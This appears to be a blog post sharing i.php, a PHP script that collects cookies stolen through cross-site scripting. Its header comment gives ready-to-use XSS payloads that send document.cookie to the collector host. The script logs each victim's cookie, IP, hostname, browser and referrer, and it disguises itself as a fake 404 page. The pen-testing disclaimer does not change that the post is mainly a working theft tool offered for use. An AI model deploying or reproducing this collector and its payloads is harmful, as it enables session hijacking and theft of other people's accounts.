i.php, when visited will collect useful information about the visitor.
It can be used to collect cookies or other information from the visiting user.

Get a copy here – i.php.txt

[START CODE ]

<?php
/*-------------------- i.php : XSS script coded by kno------------------------
This page, when visited will collect useful information about the visitor.
It can be used to collect cookies or other information from the visiting user.
Be warrned that no effort was (intentionally) made to clean/validate input.
Please be careful not to become a victim of XSS yourself when viewing the logs.
It is best to save the logs with a .txt extension.

Example XSS Scripts to Get Info (where http://192.168.56.101/ is this page):

#EXAMPLE 1
<script>new Image().src="http://192.168.56.101/i?c="+document.cookie; </script>

#EXAMPLE 2
<script>new Image().src="http://192.168.56.101/i?c="+document.cookie+"&e=XSS-ID123"; </script>

To create the log for the first time:
touch log.txt  #From path of i.php noted in settings
chmod 655 log.txt

To reset the log from a web browser:

http://192.168.56.101/?reset=su6ad4tH

To display the log form the browser:

http://192.168.56.101/?display=su6ad4tH

There is an extra variable 'e' that can receive extra info from the command line if need be.

Do not use this without proper permission from all users or the appropriate
authority. This is intended for pen testing, and as a XSS Proof Of Concept.  
You are solely responsible for any use of this script/page.  If you couldn't
have coded this yourself, don't use it.
*/

#Settings
$log = 'logs/info.txt'; //It is good idea to place this out of the webroot ('../wwwlog/log.txt')
$page_name = '/i.php'; //Used in 404 Page
$password = 'su6ad4tH'; //Used to clear the log and display output via web. (Null Password Disables This Feature)

#Get Cookie
$cookie = $_GET['c'];

#Get extra info
$extra = $_GET['e'];

#Get Broswer Type
$browser = $_SERVER['HTTP_USER_AGENT'];

#Get Refering Agent
$refer = $_SERVER['HTTP_REFERER']; 

#Get IP
if (getenv(HTTP_X_FORWARDED_FOR)){
 $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
 $ip = $_SERVER['REMOTE_ADDR'];
}

#Get Hostname
$hostname = gethostbyaddr($ip);

#Create Timestamp
$timestamp = date("Y:m:d:H:i:s");

#Write Output
$file_handle = fopen($log, 'a');
if($file_handle){
 $output = "TIME: " . $timestamp . "\n";
 if($ip) {             $output = $output . "IP: " . $ip . "\n"; }
 if($hostname) {     $output = $output . "HOST: " . $hostname . "\n"; }
 if($browser) {           $output = $output . "BROWSER: " . $browser . "\n"; }
 if($refer) {              $output = $output . "REFERER: " . $refer . "\n"; }
 if($cookie) {         $output = $output . "COOKIE: " . $cookie . "\n"; }
 if($extra) {         $output = $output . "EXTRA: " . $extra . "\n"; }
 $output=$output . "\n";

 if($_GET['display'] != $password || $_GET['display'] == null){
 fwrite($file_handle, $output);
 }
 fclose($file_handle);
}
//If  The Page is set to Reset....
if($_GET['reset'] != null && $_GET['reset'] == $password){
 $fp = fopen($log, 'w');
 if($fp){
 fclose($fp);
 echo "<html><head><title>Page Reset</title></head><body><h1>Page Reset</h1></body></html>";
 } else { echo "<h2>Page Was Not Able To Be Reset</h2></body></html>"; }
//If it is set to Display....
} elseif ($_GET['display'] != null && $_GET['display'] == $password){
 header('Content-type:text/plain');
 system('cat ' . $log);
//Otherwise...
} else {
echo "<html><head><title>404 Not Found</title></head>\n<body bgcolor=white>\n<h1>404 Not Found</h1>\nThe requested URL " . $page_name . " does not exist.\n</body></html>";
}
?>

[END CODE]

Note:@superevr mentioned using header(‘Content-type:text/plain’);  I like that more, so I updated the code.  #10/29/10